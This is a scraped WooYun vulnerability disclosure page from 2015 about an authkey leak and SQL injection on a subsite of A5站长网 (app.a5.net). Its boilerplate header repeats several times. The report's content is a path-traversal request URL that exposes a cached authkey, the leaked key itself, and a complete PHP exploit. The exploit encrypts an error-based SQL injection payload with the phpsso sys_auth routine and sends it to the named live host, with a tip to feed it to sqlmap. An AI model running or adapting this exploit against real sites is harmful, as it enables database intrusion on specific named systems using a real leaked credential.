A5站长网某分站authkey信息泄漏可注入 | wooyun-2015-0151660| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151660

漏洞标题：A5站长网某分站authkey信息泄漏可注入

漏洞作者：岛云首席鉴黄师

提交时间：2015-11-04 09:41

修复时间：2015-11-09 09:42

公开时间：2015-11-09 09:42

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-04：细节已通知厂商并且等待厂商处理中
2015-11-09：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

……

详细说明：

http://app.a5.net//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&amp;path=admin

EXP：

<?php
set_time_limit(0);
$wang_url = 'http://app.a5.net/';
echo $wang_url."\r\n";
$auth_key = 'B0OMEnTn7mFTVppclR8E9qNIMikQPq6I';
//$str = "uid=".stripslashes($_GET['id']);
$str = "uid=1' and (select 1 from (select count(*),concat(version(),0x5f5f,database(),0x5f5f,user(),floor(rand()*2))x from information_schema.tables group by x)a);#";
$encode = sys_auth($str, 'ENCODE', $auth_key);
$allurl=($wang_url."/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=".$encode);
$content = file_get_contents($allurl);
//header("Location: $allurl"); 
echo $content;
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
         $key_length = 4;
         $key = md5($key);
         $fixedkey = hash('md5', $key);
         $egiskeys = md5(substr($fixedkey, 16, 16));
         $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
         $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
         $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr
($string, $key_length));
         $i = 0; $result = '';
         $string_length = strlen($string);
         for ($i = 0; $i < $string_length; $i++){
                   $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
         }
         if($operation == 'ENCODE') {
                   return $runtokey . str_replace('=', '', base64_encode($result));
         } else {
                   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 
16)) {
                            return substr($result, 26);
                   } else {
                            return '';
                   }
         }
}
//或者直接$str = "uid=1";然后放sqlmap里面跑起来。速度挺快的。
///api.php?op=get_menu&act=ajax_getlist&callback=t00ls&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
?>

本地中转注入即可

漏洞证明：

如上

修复方案：

升级修复

版权声明：转载请注明来源岛云首席鉴黄师@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-11-09 09:42

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151660

漏洞标题：A5站长网某分站authkey信息泄漏可注入

相关厂商：A5站长网

漏洞作者：岛云首席鉴黄师

提交时间：2015-11-04 09:41

修复时间：2015-11-09 09:42

公开时间：2015-11-09 09:42

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源岛云首席鉴黄师@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151660

漏洞标题：A5站长网某分站authkey信息泄漏可注入

相关厂商：A5站长网

漏洞作者： 岛云首席鉴黄师

提交时间：2015-11-04 09:41

修复时间：2015-11-09 09:42

公开时间：2015-11-09 09:42

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0151660"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 岛云首席鉴黄师@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：岛云首席鉴黄师

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源岛云首席鉴黄师@乌云